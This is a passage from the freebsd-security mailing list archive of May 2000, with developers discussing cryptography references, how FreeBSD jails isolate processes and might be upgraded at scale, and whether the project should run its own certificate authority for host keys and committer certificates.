amount of thoughts." -- Winston Churchill To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 16 19:54:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from exchange.lightrealm.com (exchange.lightrealm.com [216.122.95.4]) by hub.freebsd.org (Postfix) with ESMTP id 90F9137B538 for ; Tue, 16 May 2000 19:54:46 -0700 (PDT) (envelope-from rcarskadden@lightrealm.com) Received: by EXCHANGE with Internet Mail Service (5.5.2650.21) id ; Tue, 16 May 2000 19:57:13 -0700 Message-ID: From: Rush Carskadden To: "'security@freebsd.org'" Subject: RE: SSH1, SSH2, RSA, DES, etc etc Date: Tue, 16 May 2000 19:57:13 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Those concerned about crypto - The Handbook of Applied Cryptography can be found here: http://cacr.math.uwaterloo.ca/hac/ Also, if you are looking for a good guide to various cryptographic technologies, I recommend the ICSA Guide to Cryptography (ISBN 0079137598). Applied Cryptography is THE book to own, but the ICSA has a good algo-by-algo breakdown. I might also recommend checking out the following links: Ritter's Crypto Glossary and Dictionary of Technical Cryptography - for those sometimes nasty terms - http://www.io.com/~ritter/GLOSSARY.HTM Cypherpunk HyperArchive - an extensive archive of the Cypherpunks mailing list, a list devoted to yapping about cryptography (most of the time) http://www.inet-one.com/cypherpunks/ If that isn't enough to get you started, send me an email, and I will hook you up with the motherload of crypto references. ok, Rush Carskadden -----Original Message----- From: sen_ml@eccosys.com [mailto:sen_ml@eccosys.com] Sent: Tuesday, May 16, 2000 12:31 AM To: security@FreeBSD.ORG Subject: Re: SSH1, SSH2, RSA, DES, etc etc From: "Morten Seeberg" Subject: SSH1, SSH2, RSA, DES, etc etc Date: Tue, 16 May 2000 09:13:01 +0200 Message-ID: <00bf01bfbf06$2d28f0b0$deff58c1@sos> > Does anyone know a good link to an explanation of these? not off-hand -- for crypto stuff, the book "applied cryptography 2nd ed" has pretty good descriptions of various algorithms. the handbook of applied cryptography is available via http or ftp as well, but i haven't read that myself. perhaps someone can provide a link. <--snip--> To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 6:47: 5 2000 Delivered-To: freebsd-security@freebsd.org Received: from jello.geekspace.com (jello.geekspace.com [208.154.207.134]) by hub.freebsd.org (Postfix) with SMTP id AB4B037BA47 for ; Wed, 17 May 2000 06:46:51 -0700 (PDT) (envelope-from chris.williams@third-rail.net) Received: (qmail 11014 invoked from network); 17 May 2000 13:47:15 -0000 Received: from jenica2.cust.third-rail.net (HELO third-rail.net) (@208.154.207.102) by jello.geekspace.com with SMTP; 17 May 2000 13:47:15 -0000 Message-ID: <3922A204.1A9CECCD@third-rail.net> Date: Wed, 17 May 2000 09:43:32 -0400 From: Chris Williams X-Mailer: Mozilla 4.72 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 Cc: security@freebsd.org Subject: Re: Jail: Problems? Proper Usage? Status? Practicality? References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > If a process running in the host system created a UNIX domain socket or > named pipe within the jail directory tree. Would a process running in the > jail be able to connect to and communicate with the host process through > this socket or pipe? If so I guess you could create work around for just > about anything by running it on the host system. Would this create a > potential way of defeating the jail? It does bring up the issue of buffer overflows and soforth in the process on the unjailed end of the pipe. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 8: 5:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id E444737B6F4 for ; Wed, 17 May 2000 08:05:16 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id LAA23135; Wed, 17 May 2000 11:05:07 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Wed, 17 May 2000 11:05:07 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: Geoffrey Robinson Cc: security@freebsd.org Subject: Re: Jail: Problems? Proper Usage? Status? Practicality? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 16 May 2000, Geoffrey Robinson wrote: > On Tue, 16 May 2000, Robert Watson wrote: > > > On Mon, 15 May 2000, Geoffrey Robinson wrote: > > > > > ver: FreeBSD 4.0-STABLE #0: Sun May 14 11:06:58 EDT 2000 > > > > aware that raw sockets are not allowed to jailed processes but is there > > > a workaround for ping and traceroute? > > > > Currently, no. Due to the way raw sockets work (allowing listening for > > all non-handled IP messages, and allowing direct writing of IP packets), > > it would take a bit of work to get this up and running, although it would > > be feasible. A more promising long-term goal might be to better > > virtualize network services, creating virtual interfaces and binding real > > network resources to virtual interfaces. However, that would be far more > > work. :-) > > If a process running in the host system created a UNIX domain socket or > named pipe within the jail directory tree. Would a process running in the > jail be able to connect to and communicate with the host process through > this socket or pipe? If so I guess you could create work around for just > about anything by running it on the host system. Would this create a > potential way of defeating the jail? Jail works by: 1) Chrooting the child process 2) Limiting the scope of superuser privileges accessible by uid0 processes in the jail It does not attempt to prevent processes outside the jail from communicating with processes within the jail. As such, having a process do so wouldn't defeat the jail per se, but would defeat the purpose of the jail :-). > > > As far as I know, none of the chroot() breakout mechanisms will work from > > jail(), as long as the jail() file system is constructed and maintained in > > a safe manner. For example, jail() prevents new device nodes from being > > introduced with mknod(). However, this assumes that (a) no improper > > device nodes existed in the accessible file space in the first place, and > > (b) root outside of jail() won't create them in the file space. > > What about upgrading procedures? After my last cvsup and make world > on the host system the jail could be started but could not access the > network. I had to build a new jail from scratch to get it working properly. I'm not clear on why that would happen -- the libc (etc, etc) in each jail should be kept in synch with the kernel, however, and that could be source of your problems. I.e., if you upgrade the kernel, it exports the same syscall interface to all processes, regardless of jails, so all jails making use of syscalls that have changed need to be upgraded in synch. This is the same as upgrading the kernel without upgrading your normal world. One way to substantially improve jail scalability would be to allow the same (read-only) file system to be present in all jails as the root, with only jail-local data being modified. You can imagine gratuitously using nullfs (if it worked) to do this, and mount per-jail writable fs's for appropriatel subdirectories (/etc, /usr/local, /home) with appropriate symlinks within the jail. Right now, each jail costs you the size of world, and is hard to upgrade if you have any decent number of jails. Storing all that stuff in a single tree mapped read-only into jails would solve that (you'd probably want two so you could upgrade one, test it, and then swap to that for all jails so as to minimize downtime). > > Jail is being actively maintained; I have some ideas for it in the long > > term, but probably won't get to carrying them to fruition for a few > > months. This includes improved management capability (unique jailids, > > ability to deliver a signal to an entire jail from outside the jail, as > > well as special purpose binaries such as a jailinit to manage setup and > > shutdown of jails in an orderly manner. If you are interested in working > > on such features, I'd be glad to share design thoughts with you, as it > > will take me a while to get to this stuff. > > I would like to try. I don't know how much help I could be. Please, let me > know what I can do. I'll do what I can. I'll gather up my notes on possible improvements and post them to -security sometime in the next week or two. Thanks! Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 9: 8:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from gw.nectar.com (gw.nectar.com [209.98.143.44]) by hub.freebsd.org (Postfix) with ESMTP id 0EDB337BC87; Wed, 17 May 2000 09:08:06 -0700 (PDT) (envelope-from nectar@nectar.com) Received: from bone.nectar.com (bone.nectar.com [10.0.1.105]) by gw.nectar.com (Postfix) with ESMTP id F1A989B10; Wed, 17 May 2000 11:08:04 -0500 (CDT) Received: by bone.nectar.com (Postfix, from userid 1001) id EC3C81DAB; Wed, 17 May 2000 11:07:58 -0500 (CDT) Date: Wed, 17 May 2000 11:07:58 -0500 From: "Jacques A . Vidrine" To: Robert Watson Cc: Geoffrey Robinson , security@freebsd.org Subject: Re: Jail: Problems? Proper Usage? Status? Practicality? Message-ID: <20000517110758.C6884@bone.nectar.com> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2i In-Reply-To: ; from rwatson@freebsd.org on Wed, May 17, 2000 at 11:05:07AM -0400 X-Url: http://www.nectar.com/ Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, May 17, 2000 at 11:05:07AM -0400, Robert Watson wrote: > Jail works by: > > 1) Chrooting the child process > 2) Limiting the scope of superuser privileges accessible by uid0 processes > in the jail 3) Limiting network access to a single IP address [snip] > Right now, each jail costs you the size of > world, and is hard to upgrade if you have any decent number of jails. You don't need the whole world depending on what you are doing. If a jail is setup for the purposes of a single application (which I expect is the most common scenario), you only need the files that support it. Upgrading the jail is simple if you created a script to create the jail in the first place -- you re-run the script after upgrading the base system. For me the real problem with this scheme is producing the script for building a jail in the first place. I do it by hand. One of these days I'd like to try writing an application that can generate a first-draft script for building a jail, given a list of applications that need to run in the jail. I think it might be nifty to do this based on the output of a ktrace on the target applications during a test run. > Storing all that stuff in a single tree mapped read-only into jails would > solve that (you'd probably want two so you could upgrade one, test it, and > then swap to that for all jails so as to minimize downtime). I don't think you want this unless the purpose of your jail is to provide a `complete virtual server' for shell access et. al. I don't want e.g. `cc' or `sync' or most of the things in `/dev' to be available to a jailed process. > I'll gather up my notes on possible improvements and post them to > -security sometime in the next week or two. Thanks! Yay, thanks Robert! -- Jacques Vidrine / n@nectar.com / nectar@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 9:42:44 2000 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id 0744937B9A2 for ; Wed, 17 May 2000 09:42:28 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.9.3/8.9.3) with SMTP id MAA23728; Wed, 17 May 2000 12:41:49 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Wed, 17 May 2000 12:41:49 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org To: "Jacques A . Vidrine" Cc: Geoffrey Robinson , security@freebsd.org Subject: Re: Jail: Problems? Proper Usage? Status? Practicality? In-Reply-To: <20000517110758.C6884@bone.nectar.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 17 May 2000, Jacques A . Vidrine wrote: > On Wed, May 17, 2000 at 11:05:07AM -0400, Robert Watson wrote: > > Jail works by: > > > > 1) Chrooting the child process > > 2) Limiting the scope of superuser privileges accessible by uid0 processes > > in the jail > 3) Limiting network access to a single IP address > > [snip] > > Right now, each jail costs you the size of > > world, and is hard to upgrade if you have any decent number of jails. > > You don't need the whole world depending on what you are doing. If a > jail is setup for the purposes of a single application (which I expect > is the most common scenario), you only need the files that support it. I had a script that built a much-reduced world necessary for a simple virtual server environment. As you suggest, it's possible to throw out almost all of /sbin, substantial parts of {/bin,/usr/bin,/usr/sbin}, all of /boot, /kernel, and so on. Many of these utilities are used for managing hardware, the boot process, etc, and are not relevant in a restricted jail environment. Sadly, my concise list of files got toasted with a lost notebook hard disk, and I haven't had a chance to reproduce it yet. I probably will at some point. Even so, by the time you've thrown in a substantial /usr/lib and so on, you still have a decent sized chunk that is identical across all jails. A working read-only nullfs would substantially improve this problem. It also improves the backup situation: I can require (and enforce) that all jail-specific data be stored in {/etc,/local/,var} off of the jail root, and not worry that by upgrading /usr I'm going to wipe out local files, and know that my backups catch everything. > Upgrading the jail is simple if you created a script to create the jail > in the first place -- you re-run the script after upgrading the base > system. Simple, but costly. Imagine for a moment that you have 700 jails on a single machine, and you'd like to be able to consistently announce to all admins of all jails that a version upgrade is taking place on 5/16/2000, and the downtime is one hour :-). I'd rather have a single file system exported to all jails, saving space and time. > For me the real problem with this scheme is producing the script for > building a jail in the first place. I do it by hand. One of these days > I'd like to try writing an application that can generate a first-draft > script for building a jail, given a list of applications that need to > run in the jail. I think it might be nifty to do this based on the > output of a ktrace on the target applications during a test run. I didn't have mine tuned quite that much, I just eliminated clearly unnecessary things (dmesg, ipfw, ifconfig, ...). Clearly what you eliminate depends a lot on what you want to do with the jail. You might consider using some combination of nm and strings to pull out dependencies, also. I had a tool at one point that caught all read and write references to files during the boot process, which I was using to determine appropriate file settings for securelevel. A similar idea for jails would be a possibility, although that only catches the files that were used, not the files that might be used :-). > > Storing all that stuff in a single tree mapped read-only into jails would > > solve that (you'd probably want two so you could upgrade one, test it, and > > then swap to that for all jails so as to minimize downtime). > > I don't think you want this unless the purpose of your jail is to > provide a `complete virtual server' for shell access et. al. I don't > want e.g. `cc' or `sync' or most of the things in `/dev' to be available > to a jailed process. The majority of /dev is already not available, or there would be security problems. :-) Again, I agree -- it's possible to substantially trim. However, in the environment I'm looking at, 30mb per-jail wasted is a lot of waste. With 700 jails, that's 2.1gb of wasted space (which needs to be RAID for the jails to be reliable), and also 2.1gb of copied files for each upgrade, opening a substantial time window for problems to occur. I'd like to be able to (effectively) atomically upgrade a jail by shutting down the jail, umounting its /usr reference, mounting the new /usr reference, and restarting the jail. Needless to say, this would require two jail /usr partitions, one that was to be moved in, one that would contain the old one while the move was in progress. > > I'll gather up my notes on possible improvements and post them to > > -security sometime in the next week or two. Thanks! > > Yay, thanks Robert! Robert N M Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: AF B5 5F FF A6 4A 79 37 ED 5F 55 E9 58 04 6A B1 TIS Labs at Network Associates, Safeport Network Services To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 10: 6:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from www.menzor.dk (menzor.org [195.249.147.160]) by hub.freebsd.org (Postfix) with ESMTP id ADD2537B7A6; Wed, 17 May 2000 10:06:37 -0700 (PDT) (envelope-from ml@seeberg.dk) Received: from sos (userhost.mdes.dk [130.228.127.200] (may be forged)) by www.menzor.dk (8.8.8/8.8.8) with SMTP id TAA22837; Wed, 17 May 2000 19:52:28 +0200 (CEST) (envelope-from ml@seeberg.dk) Message-ID: <020c01bfc022$68e03b50$deff58c1@sos> From: "Morten Seeberg" To: "Robert Watson" , References: Subject: Re: Jail: Problems? Proper Usage? Status? Practicality? Date: Wed, 17 May 2000 19:07:38 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2919.6700 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > One way to substantially improve jail scalability would be to allow the > same (read-only) file system to be present in all jails as the root, with > only jail-local data being modified. You can imagine gratuitously using I haven´t had time to play with jail, but according to what PHK said at a seminar where he explained the jail functionality, he said that you could have just 1 filesystem, and mount it via NFS. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 10:39:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (obie.softweyr.com [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id BF14937B5EB; Wed, 17 May 2000 10:39:24 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from softweyr.com (ip43.salt-lake-city6.ut.pub-ip.psi.net [38.27.95.43]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id LAA13526; Wed, 17 May 2000 11:39:05 -0600 (MDT) (envelope-from wes@softweyr.com) Message-ID: <3922D9A3.9EEC6033@softweyr.com> Date: Wed, 17 May 2000 11:40:51 -0600 From: Wes Peters Reply-To: security@FreeBSD.org Organization: Softweyr LLC X-Mailer: Mozilla 4.7 [en] (X11; U; FreeBSD 4.0-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: Robert Watson Cc: Darren Reed , Peter Wemm , committers@FreeBSD.org, security@FreeBSD.org Subject: Re: HEADS UP: New host key for freefall! References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Robert Watson wrote: > > [previous material elided because we're in violent agreement] > > Now to address Wes's point: I don't believe SSH1 can do certification, > although I don't know about SSH2. Oh, I was referrering to certificates for sending S/MIME email. > At TIS, we have a DNSsec adaptation to > store host keys in DNS securely, but the secure resolver for BIND9 wasn't > done last I checked, meaning that an SSH client cannot automatically > retrieve and verify the host key using DNSsec yet. DNSsec would really be > an ideal way to distribute host keys for SSH, so I'll push on appropriate > parties to see if we can finish it up some time soon (really depends on > the Nominum/ISC folks). We'll await news from you. > I do agree that we need to do a CA, but as I've mentioned before, we need > to do it *right* or not at all. This means a secure key storage > mechanism/facility, offline signing key, etc, etc. Rather than grow our > own, it might be easier (and more affordable) to sit on someone else's, > unless BSDi has one already? Does anyone know anything about > inter-cert-format certification? I.e., can an x.509 PKI root sign PGP > keys in a useful way? Is it usefully verifiable in an automated way? Not that I know of, unless you count sending the PGP keys in an S/MIME message. I suspect that might be adequate for our needs, but will defer to the expertise of our resident crypto-heads. My security expertise runs more towards system configuration and protocol design. > OpenSSL can handle CA behavior, but there are presumably commercial > products that can do a much better job in terms to handling key splitting, > etc. Some comparison shopping and communication I'm not sure we'll be doing a large enough volume to warrant paying money for CA services. I guess we'd have to work out a plan for what classes of persons and/or positions we plan to issue keys/certs to in order to answer that question. If we're talking about a CA cert, a cert for each of the "hats", and a cert for each committer individually, that means right now we'd need to manage about 210 certs, of which 5 or 6 need to be transferrable. Plus, I really like the idea of a cert with "The FreeBSD Project" as the CA. Are we not the most reliable source of information about FreeBSD? Replies directed to -security, as this has grown out of the scope of committers. (And because I don't want Sheldon to yell again. ;^) -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC wes@softweyr.com http://softweyr.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 12:12: 4 2000 Delivered-To: freebsd-security@freebsd.org Received: from androcles.com (androcles.com [204.57.240.10]) by hub.freebsd.org (Postfix) with ESMTP id 58C6C37BCA8 for ; Wed, 17 May 2000 12:11:55 -0700 (PDT) (envelope-from alex@androcles.com) Received: (from dhh@localhost) by androcles.com (8.9.3/8.9.3) id MAA99870 for security@FreeBSD.ORG; Wed, 17 May 2000 12:11:50 -0700 (PDT) Message-ID: X-Mailer: XFMail 1.4.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit MIME-Version: 1.0 In-Reply-To: <3922D9A3.9EEC6033@softweyr.com> Date: Wed, 17 May 2000 12:11:50 -0700 (PDT) From: "Duane H. Hesser" To: security@FreeBSD.ORG Subject: Re: HEADS UP: New host key for freefall! Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Sorry to bust in in the middle like this. This is the first message on this topic I've seen, so I haven't seen the "previous material", thus the comments/questions below may be irrelevant to the discussion at hand (if so, please forgive the intrusion). For some time, I have had an interest SDSI (Simple Distributed Security Infrastructure) by Ronald Rivest and Butler Lampson. It has a simple elegance which appeals to me, although I have not yet had much opportunity to work with it. Would this infrastructure be of interest in your current discussion? For those who are not familiar with it yet, the following links may be of interest: http://theory.lcs.mit.edu/~rivest/sdsi10.html (just scan the Overview to get the concept) The "top" page, from which distributions and related papers may be accessed is http://theory.lcs.mit.edu/~cis/sdsi.html SDSI has been integrated with SPKI in the past year or so; there's even a Java implementation for those inclined in that direction. If this is out of scope for your current discussion, I'd still be interested in hearing comments (positive or negative) from anyone inclined. Now back to your regularly scheduled programming... On 17-May-00 Wes Peters wrote: > Robert Watson wrote: >> >> [previous material elided because we're in violent agreement] >> >> Now to address Wes's point: I don't believe SSH1 can do certification, >> although I don't know about SSH2. > > Oh, I was referrering to certificates for sending S/MIME email. > >> At TIS, we have a DNSsec adaptation to >> store host keys in DNS securely, but the secure resolver for BIND9 wasn't >> done last I checked, meaning that an SSH client cannot automatically >> retrieve and verify the host key using DNSsec yet. DNSsec would really be >> an ideal way to distribute host keys for SSH, so I'll push on appropriate >> parties to see if we can finish it up some time soon (really depends on >> the Nominum/ISC folks). > > We'll await news from you. > >> I do agree that we need to do a CA, but as I've mentioned before, we need >> to do it *right* or not at all. This means a secure key storage >> mechanism/facility, offline signing key, etc, etc. Rather than grow our >> own, it might be easier (and more affordable) to sit on someone else's, >> unless BSDi has one already? Does anyone know anything about >> inter-cert-format certification? I.e., can an x.509 PKI root sign PGP >> keys in a useful way? Is it usefully verifiable in an automated way? > > Not that I know of, unless you count sending the PGP keys in an S/MIME > message. I suspect that might be adequate for our needs, but will defer > to the expertise of our resident crypto-heads. My security expertise > runs more towards system configuration and protocol design. > >> OpenSSL can handle CA behavior, but there are presumably commercial >> products that can do a much better job in terms to handling key splitting, >> etc. Some comparison shopping and communication > > I'm not sure we'll be doing a large enough volume to warrant paying money > for CA services. I guess we'd have to work out a plan for what classes > of persons and/or positions we plan to issue keys/certs to in order to > answer that question. If we're talking about a CA cert, a cert for each > of the "hats", and a cert for each committer individually, that means > right now we'd need to manage about 210 certs, of which 5 or 6 need to > be transferrable. > > Plus, I really like the idea of a cert with "The FreeBSD Project" as the > CA. Are we not the most reliable source of information about FreeBSD? > > Replies directed to -security, as this has grown out of the scope of > committers. (And because I don't want Sheldon to yell again. ;^) > > -- > "Where am I, and what am I doing in this handbasket?" > > Wes Peters Softweyr LLC > wes@softweyr.com http://softweyr.com/ > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -------------- Duane H. Hesser dhh@androcles.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 12:51:40 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id EFBFB37BCB4; Wed, 17 May 2000 12:51:24 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id PAA15001; Wed, 17 May 2000 15:51:16 -0400 (EDT) (envelope-from wollman) Date: Wed, 17 May 2000 15:51:16 -0400 (EDT) From: Garrett Wollman Message-Id: <200005171951.PAA15001@khavrinen.lcs.mit.edu> To: Kris Kennaway Cc: Robert Watson , Wes Peters , Peter Wemm , security@FreeBSD.org Subject: Re: HEADS UP: New host key for freefall! In-Reply-To: References: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > On Wed, 17 May 2000, Robert Watson wrote: >> I do agree that we need to do a CA, but as I've mentioned before, we need >> to do it *right* or not at all. This means a secure key storage >> mechanism/facility, offline signing key, etc, etc. Rather than grow our >> own, it might be easier (and more affordable) to sit on someone else's, >> unless BSDi has one already? > Agreed. I think it's important to consider that the level of effort required to implement maximal assurance may not necessarily be appropriate for this project. (It certainly isn't appropriate for my organization, and we have 500 people on staff and 6 people working full-time on {sys,net}admin.) >> Does anyone know anything about inter-cert-format certification? >> I.e., can an x.509 PKI root sign PGP keys in a useful way? Is it >> usefully verifiable in an automated way? > In principle this can be done by extracting a PGP key from the X.509 > certificate since (AFAIK) it contains (can contain) all of the required > bits. I'm not sure if something more direct has been standardized, though. It would be much easier to simply use an X.509 object signing tool to sign the canonicalized PGP key, and vice versa. Or, alternatively, dispense with one of the technologies entirely. X.509 for privacy-enhanced mail appears to be effectively dead, and has been for some time. >> I've been pushing on PGP, Inc (my employer) to ship a native FreeBSD >> version of PGP, not just Linux+everythingelseintheworld, but they push >> back that they've received none (zero) requests for a FreeBSD port. Perhaps all the FreeBSD people are using either 2.6.2 or GnuPG, so they really don't care whether the commercial product exists or not. I use GnuPG, personally, since then I don't have to worry about any licensing issues at all. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 13: 9:37 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 82C7B37BC82; Wed, 17 May 2000 13:09:32 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id NAA86571; Wed, 17 May 2000 13:09:32 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Wed, 17 May 2000 13:09:32 -0700 (PDT) From: Kris Kennaway To: security@freebsd.org Cc: Robert Watson , Darren Reed , Peter Wemm Subject: Re: HEADS UP: New host key for freefall! In-Reply-To: <3922D9A3.9EEC6033@softweyr.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Wed, 17 May 2000, Wes Peters wrote: > > Now to address Wes's point: I don't believe SSH1 can do certification, > > although I don't know about SSH2. > > Oh, I was referrering to certificates for sending S/MIME email. In theory PKI can do everything [*]: S/MIME email, PGP signatures, signed SSH hostkeys so you don't have to explicitly verify the new key through out-of-band trusted channels, SSL certificates for secure web services, etc. In theory these formats should all be pretty inter-convertible, since they all contain "enough crypto" (packaged in different ways) to make a decent protocol happy. > I'm not sure we'll be doing a large enough volume to warrant paying money > for CA services. I guess we'd have to work out a plan for what classes > of persons and/or positions we plan to issue keys/certs to in order to > answer that question. If we're talking about a CA cert, a cert for each > of the "hats", and a cert for each committer individually, that means > right now we'd need to manage about 210 certs, of which 5 or 6 need to > be transferrable. The point of a PKI is that you can have a *single* trusted root certificate with all others signed by that one in a hierarchy. In order to root the tree in something which (e.g.) Netscape browsers will automatically understand, we'd need to have at least one key signed by a commercial CA (Verisign, Thawte, ..) which is used as the basis for the FreeBSD PKI, but there's no inherent need for more than one "purchased" certificate. > Plus, I really like the idea of a cert with "The FreeBSD Project" as the > CA. Are we not the most reliable source of information about FreeBSD? Certified signatures are not about verifying the information content of data, it's about verifying the integrity of the message and the authenticity of the signing key. Kris [*] See however http://www.counterpane.com/pki-risks.html ---- In God we Trust -- all others must submit an X.509 certificate. -- Charles Forsythe To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 13:17:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id F1F6B37BCC9; Wed, 17 May 2000 13:17:14 -0700 (PDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.3/8.9.3) id QAA26098; Wed, 17 May 2000 16:17:13 -0400 (EDT) (envelope-from wollman) Date: Wed, 17 May 2000 16:17:13 -0400 (EDT) From: Garrett Wollman Message-Id: <200005172017.QAA26098@khavrinen.lcs.mit.edu> To: Kris Kennaway Cc: security@FreeBSD.ORG, Robert Watson , Darren Reed , Peter Wemm Subject: Re: HEADS UP: New host key for freefall! In-Reply-To: References: <3922D9A3.9EEC6033@softweyr.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > The point of a PKI is that you can have a *single* trusted root > certificate with all others signed by that one in a hierarchy. In order to > root the tree in something which (e.g.) Netscape browsers will > automatically understand, we'd need to have at least one key signed by a > commercial CA (Verisign, Thawte, ..) ...who are generally unwilling to sign CA certificates, and when they are, charge very large sums of money to do so. This is why most organizations which use X.509 for internal authentication purposes run their own CAs and deploy customized Web-browser installations which come with the appropriate CA certs preinstalled. (My employer, which owns tens of thousands of computers and has almost as many employees, does this. People who install the ``latest and greatest'' browser from wherever don't get support.) -GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed May 17 13:26:30 2000 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 4B7DD37BD62; Wed, 17 May 2000 13:26:24 -0700 (PDT) (envelope-from kris@FreeBSD.org) Received: from localhost (kris@localhost) by freefall.freebsd.org (8.9.3/8.9.2) with ESMTP id NAA89256; Wed, 17 May 2000 13:26:24 -0700 (PDT) (envelope-from kris@FreeBSD.org) X-Authentication-Warning: freefall.freebsd.org: kris owned process doing -bs Date: Wed, 17 May 2000 13:26:23 -0700 (PDT) From: Kris Kennaway 